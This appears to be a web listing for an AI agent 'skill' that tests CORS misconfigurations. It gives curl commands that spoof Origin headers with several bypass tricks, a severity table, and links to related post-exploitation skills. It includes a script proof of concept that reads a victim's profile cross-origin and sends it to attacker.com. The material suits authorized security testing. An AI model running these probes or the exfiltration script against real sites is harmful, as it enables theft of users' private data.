Menü
CORS misconfiguration testing — origin reflection, wildcard bypass, null origin, credential leakage
Mit Codex oder Claude installieren Kopieren Sie diesen Prompt, fügen Sie ihn in Codex, Claude oder einen anderen Assistant ein und lassen Sie die Skill-Seite prüfen und installieren.
Basierend auf der SOC-Berufsklassifikation
eBPF-based post-exploitation for kernel-level credential harvesting, process hiding, and traffic interception on Linux
AWS post-exploitation for IAM privilege escalation, data exfiltration, persistence, and operational security via boto3
Azure/Entra ID post-exploitation for tenant compromise, Key Vault extraction, managed identity abuse, and token manipulation
CI/CD pipeline attacks for secret extraction, pipeline injection, and supply chain compromise via GitHub/Jenkins/GitLab
Kubernetes post-exploitation for container escape, secret extraction, RBAC abuse, and cluster persistence
macOS post-exploitation for credential harvesting, DTrace monitoring, TCC bypass, and stealth operations via native tools
| name | attack-cors |
| description | CORS misconfiguration testing — origin reflection, wildcard bypass, null origin, credential leakage |
| category | web-application |
| version | 1.0 |
| author | cyberstrike-official |
| tags | ["cors","web","owasp","access-control","attack"] |
| tech_stack | ["web"] |
| cwe_ids | ["CWE-942","CWE-346"] |
| chains_with | ["attack-open-redirect","attack-idor-automation"] |
| prerequisites | [] |
| severity_boost | {"attack-open-redirect":"CORS + open redirect = token theft via cross-origin request"} |
Identify Cross-Origin Resource Sharing misconfigurations that allow unauthorized cross-origin access to sensitive data or APIs.
Test if the server reflects arbitrary origins in Access-Control-Allow-Origin:
# Automated CORS checker (bundled script)
attack_script cors_checker https://TARGET/api/endpoint --json-output
Manual tests:
# Arbitrary origin
curl -s -H "Origin: https://evil.com" TARGET_URL -D- | grep -i "access-control"
# Subdomain bypass
curl -s -H "Origin: https://TARGET.evil.com" TARGET_URL -D-
# Null origin
curl -s -H "Origin: null" TARGET_URL -D-
# HTTP downgrade
curl -s -H "Origin: http://TARGET" TARGET_URL -D-
# Backtick bypass
curl -s -H "Origin: https://TARGET%60.evil.com" TARGET_URL -D-
# Underscore bypass
curl -s -H "Origin: https://TARGET_.evil.com" TARGET_URL -D-
# CRLF injection
curl -s -H "Origin: https://evil.com%0d%0a" TARGET_URL -D-
# Prefix matching bypass
curl -s -H "Origin: https://evil-TARGET" TARGET_URL -D-
If ACAO reflects attacker origin + ACAC is true:
<!-- PoC: reads victim data cross-origin -->
<script>
fetch('https://TARGET/api/user/profile', {
credentials: 'include'
})
.then(r => r.json())
.then(d => fetch('https://attacker.com/log?data=' + btoa(JSON.stringify(d))))
</script>
| Condition | Severity |
|---|---|
| Arbitrary origin reflected + credentials allowed | Critical (P1) |
| Arbitrary origin reflected, no credentials | Medium (P3) |
| null origin accepted + credentials allowed | High (P2) |
| Subdomain origin reflected + credentials | High (P2) |
| Wildcard ACAO with credentials | Medium (P3) |
Origin headerAccess-Control-Allow-Origin reflectionAccess-Control-Allow-Credentials: trueattack_script cors_checker — automated multi-origin testingcurl — manual header injection